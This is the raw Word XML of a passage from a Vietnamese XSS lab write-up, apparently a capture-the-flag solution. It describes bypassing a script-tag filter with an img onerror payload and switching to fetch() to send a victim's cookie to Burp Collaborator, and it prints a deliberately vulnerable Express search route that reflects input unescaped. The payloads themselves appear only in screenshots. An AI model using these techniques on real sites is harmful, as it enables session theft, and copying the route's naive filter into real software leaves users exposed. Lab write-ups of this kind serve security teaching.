    <w:p w14:paraId="2F79397E" w14:textId="128A0E6B" w:rsidR="00ED6FF5" w:rsidRPr="00ED6FF5" w:rsidRDefault="00ED6FF5" w:rsidP="00ED6FF5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Trước </w:t>
      </w:r>
      <w:r w:rsidR="00382E61">
        <w:t xml:space="preserve">tiên thực hiện kiểm tra chức năng lọc bằng cách đưa lại payload </w:t>
      </w:r>
      <w:r w:rsidR="0089215E">
        <w:t>chứa thẻ script đã dùng ở bài 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FE6ECE" w14:textId="5BCC5FC5" w:rsidR="00DA21B6" w:rsidRDefault="00222FE7" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00222FE7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A82E4BA" wp14:editId="7F28E97C">
            <wp:extent cx="5731510" cy="2827020"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="962546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6297" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2827020"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EEE0ED" w14:textId="5F923F1F" w:rsidR="00C640B4" w:rsidRPr="00C640B4" w:rsidRDefault="00C640B4" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Kết quả hiển thị cho thấy </w:t>
      </w:r>
      <w:r w:rsidR="00242B15">
        <w:t>rằng thẻ &lt;script&gt; đã bị lọc mất và được thay thế bằng giá trị trống khiến cho kết quả chỉ hiện thị rằng không tìm thấy alert():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01635BF9" w14:textId="6EDA2C5D" w:rsidR="00222FE7" w:rsidRDefault="00222FE7" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00222FE7">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42E4D49C" wp14:editId="4407E721">
            <wp:extent cx="5731510" cy="670560"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2735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439" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId25"/>
                    <a:srcRect b="13936"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="670560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A5FB60" w14:textId="35178C7B" w:rsidR="00DA6976" w:rsidRPr="00DA6976" w:rsidRDefault="00DA6976" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Thay thế bằng cách sử dụng thẻ img với thuộc tính src=1 là một giá trị lỗi, giúp kích hoạt sự kiện đằng sau khởi chạy lệnh alert() mỗi khi bị lỗi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1D6665" w14:textId="5E6DFABA" w:rsidR="00222FE7" w:rsidRDefault="002F2607" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002F2607">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C38A722" wp14:editId="647AC759">
            <wp:extent cx="5647690" cy="2201923"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="1480218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18250" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId26"/>
                    <a:srcRect t="3506" b="4383"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5649113" cy="2202478"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E810722" w14:textId="4B9411FF" w:rsidR="007F6FD3" w:rsidRPr="007F6FD3" w:rsidRDefault="007F6FD3" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Kết quả cho thấy lệnh alert() đã được thực thi thành công:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DCA2D0" w14:textId="43FF9CD3" w:rsidR="002F2607" w:rsidRDefault="002F2607" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002F2607">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4030197A" wp14:editId="623FF232">
            <wp:extent cx="5731510" cy="1379220"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1757407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7420" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1379220"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="67532912" w14:textId="4F5154D1" w:rsidR="007F6FD3" w:rsidRPr="007F6FD3" w:rsidRDefault="00421EE6" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Thay đổi payload từ alert() sang fetch() để tiếp tục thực hiện lấy </w:t>
      </w:r>
      <w:r w:rsidR="00AE1A9C">
        <w:t>cookie:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18ACA4F4" w14:textId="209A20DE" w:rsidR="002F2607" w:rsidRDefault="00B90554" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00B90554">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53EBB69E" wp14:editId="3283A98D">
            <wp:extent cx="5731510" cy="363220"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="108155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55255" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="363220"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A22B997" w14:textId="772D8F0A" w:rsidR="00AE1A9C" w:rsidRPr="00AE1A9C" w:rsidRDefault="00AE1A9C" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mở </w:t>
      </w:r>
      <w:r w:rsidR="00F75865">
        <w:t>Burp Collaborator</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> và thành công lấy được cookie:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762173BB" w14:textId="79900094" w:rsidR="00B90554" w:rsidRDefault="00B90554" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00B90554">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24733397" wp14:editId="6703E128">
            <wp:extent cx="5731510" cy="1586230"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1594435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35347" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1586230"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="79291396" w14:textId="5065B4FC" w:rsidR="00AE1A9C" w:rsidRPr="00ED6FF5" w:rsidRDefault="00AE1A9C" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Tương tự thì sẽ cần gửi url chứa payload sang nạn nhân để lấy flag nên mình sẽ không thực hiện bước này để không lộ flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB31ED6" w14:textId="24E9AD7E" w:rsidR="00765D3F" w:rsidRPr="00FF23DE" w:rsidRDefault="00765D3F" w:rsidP="00765D3F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF23DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Level</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF23DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00793BF0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB2C9DE" w14:textId="77777777" w:rsidR="00765D3F" w:rsidRPr="00FF23DE" w:rsidRDefault="00765D3F" w:rsidP="00765D3F">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765D3F" w:rsidRPr="008E43EE" w14:paraId="26B9156D" w14:textId="77777777" w:rsidTr="006765C9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BF7001F" w14:textId="77777777" w:rsidR="00765D3F" w:rsidRPr="008E43EE" w:rsidRDefault="00765D3F" w:rsidP="006765C9">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008E43EE">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DCC811F" w14:textId="77777777" w:rsidR="00765D3F" w:rsidRPr="008E43EE" w:rsidRDefault="00765D3F" w:rsidP="006765C9">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008E43EE">
              <w:t>2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="098276A1" w14:textId="77777777" w:rsidR="00765D3F" w:rsidRPr="008E43EE" w:rsidRDefault="00765D3F" w:rsidP="006765C9">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008E43EE">
              <w:t>3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D0DB555" w14:textId="77777777" w:rsidR="00765D3F" w:rsidRPr="008E43EE" w:rsidRDefault="00765D3F" w:rsidP="006765C9">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008E43EE">
              <w:t>4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41F27C95" w14:textId="77777777" w:rsidR="00765D3F" w:rsidRPr="008E43EE" w:rsidRDefault="00765D3F" w:rsidP="006765C9">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008E43EE">
              <w:t>5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EA23FF7" w14:textId="77777777" w:rsidR="00765D3F" w:rsidRPr="008E43EE" w:rsidRDefault="00765D3F" w:rsidP="006765C9">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008E43EE">
              <w:t>6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="017CA66C" w14:textId="77777777" w:rsidR="00765D3F" w:rsidRPr="008E43EE" w:rsidRDefault="00765D3F" w:rsidP="006765C9">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008E43EE">
              <w:t>7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29042EF3" w14:textId="77777777" w:rsidR="00765D3F" w:rsidRDefault="00765D3F" w:rsidP="006765C9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E43EE">
              <w:t>8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26093FD9" w14:textId="2089DEFF" w:rsidR="000C6666" w:rsidRPr="008E43EE" w:rsidRDefault="000C6666" w:rsidP="006765C9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56131CF6" w14:textId="77777777" w:rsidR="000C6666" w:rsidRPr="000C6666" w:rsidRDefault="000C6666" w:rsidP="000C6666">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="000C6666">
              <w:t>router.get('/search', function (req, res, next) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="364AECF3" w14:textId="77777777" w:rsidR="000C6666" w:rsidRPr="000C6666" w:rsidRDefault="000C6666" w:rsidP="000C6666">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="000C6666">
              <w:t>    // Don't allow script keyword</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7370E91C" w14:textId="77777777" w:rsidR="000C6666" w:rsidRPr="000C6666" w:rsidRDefault="000C6666" w:rsidP="000C6666">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="000C6666">
              <w:t>    if (req.query.q.search(/script/i) &gt; 0) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DABD846" w14:textId="77777777" w:rsidR="000C6666" w:rsidRPr="000C6666" w:rsidRDefault="000C6666" w:rsidP="000C6666">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="000C6666">
              <w:t>        res.send('Hack detected');</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5494CE12" w14:textId="77777777" w:rsidR="000C6666" w:rsidRPr="000C6666" w:rsidRDefault="000C6666" w:rsidP="000C6666">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="000C6666">
              <w:t>        return;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BB25DCE" w14:textId="77777777" w:rsidR="000C6666" w:rsidRPr="000C6666" w:rsidRDefault="000C6666" w:rsidP="000C6666">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="000C6666">
              <w:t>    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34C59CCD" w14:textId="77777777" w:rsidR="000C6666" w:rsidRPr="000C6666" w:rsidRDefault="000C6666" w:rsidP="000C6666">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="000C6666">
              <w:t>    html = 'Your search - &lt;b&gt;' + req.query.q + '&lt;/b&gt; - did not match any notes.&lt;br&gt;&lt;br&gt;'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C1D2CC8" w14:textId="77777777" w:rsidR="000C6666" w:rsidRPr="000C6666" w:rsidRDefault="000C6666" w:rsidP="000C6666">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="000C6666">
              <w:t>    res.send(html);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EA3A336" w14:textId="3D5BBC60" w:rsidR="00765D3F" w:rsidRPr="008E43EE" w:rsidRDefault="000C6666" w:rsidP="006765C9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000C6666">
              <w:t>});</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2577C307" w14:textId="60332318" w:rsidR="00765D3F" w:rsidRDefault="00765D3F" w:rsidP="00765D3F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00A3783F">
        <w:t xml:space="preserve">Ở level </w:t>
      </w:r>
      <w:r w:rsidR="000C6666" w:rsidRPr="000C6666">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3783F">
        <w:t>, đoạn code đã được nâng cấp bằng cách</w:t>
      </w:r>
      <w:r w:rsidR="0086416C">
        <w:t xml:space="preserve"> thay</w:t>
      </w:r>
      <w:r w:rsidR="004E18C7">
        <w:t xml:space="preserve"> thế</w:t>
      </w:r>
      <w:r w:rsidR="0086416C">
        <w:t xml:space="preserve"> chức năng chỉnh sửa thẻ &lt;script&gt; bằng cách </w:t>
      </w:r>
      <w:r w:rsidR="00F62FEC">
        <w:t xml:space="preserve">kiểm tra giá trị đầu vào và nếu phát hiện giá trị script sẽ trả về </w:t>
      </w:r>
      <w:r w:rsidR="005D5F8C">
        <w:t xml:space="preserve">thông báo </w:t>
      </w:r>
      <w:r w:rsidR="00F62FEC">
        <w:t xml:space="preserve">Hack detected ngay lập </w:t>
      </w:r>
      <w:r w:rsidR="006765C9">
        <w:t>tức</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3783F">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A3783F">
        <w:t xml:space="preserve">Do đó, dù đã có sự “nâng cấp”, ứng dụng vẫn dễ dàng bị khai thác XSS thông qua các thẻ HTML khác </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">cùng </w:t>
      </w:r>
      <w:r w:rsidRPr="00A3783F">
        <w:t xml:space="preserve">các thuộc tính sự </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">kiện </w:t>
      </w:r>
      <w:r w:rsidR="006765C9">
        <w:t>như bài trước.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E81A181" w14:textId="77777777" w:rsidR="00765D3F" w:rsidRPr="00CF619D" w:rsidRDefault="00765D3F" w:rsidP="00765D3F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF619D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">* Ý tưởng </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1DDA62" w14:textId="42432648" w:rsidR="00765D3F" w:rsidRPr="0089215E" w:rsidRDefault="00765D3F" w:rsidP="00765D3F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB6E11">
        <w:t xml:space="preserve">hèn một payload XSS không sử dụng thẻ &lt;script&gt; vào trường tìm kiếm (search) </w:t>
      </w:r>
      <w:r w:rsidR="006765C9">
        <w:t xml:space="preserve">để </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB6E11">
        <w:t>có thể thực thi JavaScript trên trình duyệt người dùng.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ví dụ thẻ img, svg,</w:t>
      </w:r>
      <w:r w:rsidR="006765C9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>....</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4FB9A4" w14:textId="77777777" w:rsidR="00765D3F" w:rsidRDefault="00765D3F" w:rsidP="00765D3F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00184ED1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>* Khai thác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB8FFCE" w14:textId="694007B2" w:rsidR="00C10D08" w:rsidRPr="00C10D08" w:rsidRDefault="00D8795A" w:rsidP="00C10D08">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Trước tiên để xem khả năng phòng thủ </w:t>
      </w:r>
      <w:r w:rsidR="005D5F8C">
        <w:t>của lab trước lỗ hổng XSS,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> thực hiện chèn </w:t>
      </w:r>
      <w:r w:rsidR="004E18C7">
        <w:t>thẻ &lt;script&gt; vào và xem kết quả phản hồi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734E76D9" w14:textId="23525C80" w:rsidR="002A10AE" w:rsidRDefault="00EA2330" w:rsidP="002A10AE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA2330">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79DE45D0" wp14:editId="079B5EF6">
            <wp:extent cx="5731510" cy="2395220"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="400575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5525" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2395220"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="002A10AE">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="00169707" w14:textId="0232E7DB" w:rsidR="00F068B3" w:rsidRDefault="00F068B3" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F068B3">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75F5650E" wp14:editId="4FABA713">
            <wp:extent cx="5449060" cy="1019317"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="105935133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1332" name="Picture 1" descr="A close-up of a computer screen&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5449060" cy="1019317"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="636C2BD2" w14:textId="41DB78F4" w:rsidR="002A10AE" w:rsidRDefault="002A10AE" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kết quả phản hồi cho thấy rằng thông báo Hack detected đã hiển thị, chứng minh khả năng lọc giá </w:t>
      </w:r>
      <w:r w:rsidR="000351C4">
        <w:t xml:space="preserve">trị chứa chuỗi </w:t>
      </w:r>
      <w:r w:rsidR="000351C4" w:rsidRPr="000351C4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:r w:rsidR="000351C4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47ABB640" w14:textId="6D70FC61" w:rsidR="00065E0D" w:rsidRDefault="00065E0D" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tiếp đó thực hiện tấn công bằng cách sử dựng thẻ img với src đến địa chỉ lỗi </w:t>
      </w:r>
      <w:r w:rsidR="003776E1">
        <w:t>để kích hoạt sự kiện onerror:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2437C0C2" w14:textId="7D0FFA38" w:rsidR="00F068B3" w:rsidRDefault="00F068B3" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F068B3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68FF24A3" wp14:editId="476DB701">
            <wp:extent cx="5731510" cy="1557655"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="120109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9435" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1557655"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
